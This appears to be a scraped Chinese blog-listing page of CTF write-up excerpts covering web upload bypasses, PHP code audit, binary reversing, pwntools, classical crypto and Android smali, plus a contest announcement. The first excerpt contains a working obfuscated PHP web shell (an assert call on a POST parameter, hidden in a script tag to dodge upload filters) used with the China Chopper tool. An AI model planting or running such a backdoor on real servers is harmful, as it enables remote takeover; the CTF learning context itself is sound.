1.可上传php文件,但是过滤了标识符 <? 以及"php"。上传1.php,内容 <script language="Php">$k="ass"."ert"; $k(${"_PO"."ST"} ['a']);</script> 菜刀连接之。 ...
分类:
其他好文 时间:
2016-09-03 21:10:21
阅读次数:
336
/有技术有时间但缺钱?CTF职业玩家适合你!/ “BSRC杯”CTF夺旗大战,是由百度应急响应中心和i春秋联合举办的CTF比赛,宗旨是在安全圈内找寻最会夺flag的CTF职业玩家。 不同于以往的传统赛事,大战对象是CTFer(CTF职业玩家),将以个人方式参与夺旗,完全凭借个人在CTF中的技艺及造诣 ...
分类:
其他好文 时间:
2016-09-01 16:21:22
阅读次数:
228
原题目链接:http://www.shiyanbar.com/ctf/1787 参考答案链接:http://blog.csdn.net/zhaohansk/article/details/44153141 题目 PHP代码审计 hint:sha1函数你有认真了解过吗?听说也有人用md5碰撞o(╯□╰ ...
分类:
Web程序 时间:
2016-08-04 14:49:37
阅读次数:
1284
第一题:hint已经给的很明白了:IDA进去,对那堆数字按R就好第二题:low_addrrsp
0x1
0x4相对地址
0x18
0x1c
high_addrrbp
00000000004004e6<func>:
4004e6:55pushrbp
4004e7:4889e5movrbp,rsp
4004ea:48897de8movQWORDPTR[rbp-0x18],rdi4个字=8个byte=64bitrdi存参数rdi..
分类:
其他好文 时间:
2016-08-02 17:24:20
阅读次数:
1643
之前主要是使用zio库,对pwntools的了解仅限于DynELF,以为zio就可以取代pwntools。后来发现pwntools有很多的高级用法都不曾听说过,这次学习一下用法,希望可以在以后的exp编写中能提供效率。 ...
分类:
编程语言 时间:
2016-08-02 10:00:03
阅读次数:
4456
没技术含量的wp,我就不写了…… 一、简单问答 一开始的时候还是看见有不少人评论这道题,不过就是点多了点,注意一点就可以了 1、火狐firebug改几个值和标签 倒数五、六行 2、把题目答案写上 q1 2016 q2 lol q3 22 true 3、抓包改数据 4、提交得flag flag{W3l ...
分类:
其他好文 时间:
2016-08-01 12:12:45
阅读次数:
277
试题网址:http://www.shiyanbar.com/ctf/18710x01首先我们得到了一个hello.dex文件,要把它反编译为smali文件,使用工具baksmali,cmd命令:java-jarbaksmali-2.0.3.jar-oclass/Hello.dex,就在当前目录下生成了一个文件夹,里边有一个hello.smali代码如下:.classpublicLHello;
..
分类:
移动开发 时间:
2016-07-25 16:43:01
阅读次数:
289
打了一天比赛、本来感受颇多,提笔却不知从哪说起,很多比赛时候的切身体验很难用文字来表达出来,就使用流水账的形式简单说下这次的比赛吧。2016CNcert网络年会&2016网络安全对抗赛是国家互联网应急中心主办,比赛模式为线下攻防赛,通过CNcert的初选共有39支队伍在成都参..
分类:
其他好文 时间:
2016-07-23 21:34:55
阅读次数:
4920
0x00 前言 正文开始之前先闲扯几句吧,玩CTF的小伙伴也许会遇到类似这样的问题:表哥,你知道这是什么加密吗?其实CTF中脑洞密码题(非现代加密方式)一般都是各种古典密码的变形,一般出题者会对密文进行一些处理,但是会给留一些线索,所以写此文的目的是想给小伙伴做题时给一些参考,当然常在CTF里出现的 ...
分类:
其他好文 时间:
2016-07-18 16:12:15
阅读次数:
667
进大学前,正式开始ACM 现在离OI退役已经过了近两年 很多东西似乎都回到了最起初的地方呢 哈哈...大一大概又是奋斗的一年吧 在入CTF前,来ACM还愿 还是那句话,never feel sorry about your ambitions 不管怎么样,never mind and keep on ...
分类:
其他好文 时间:
2016-07-03 23:18:52
阅读次数:
137
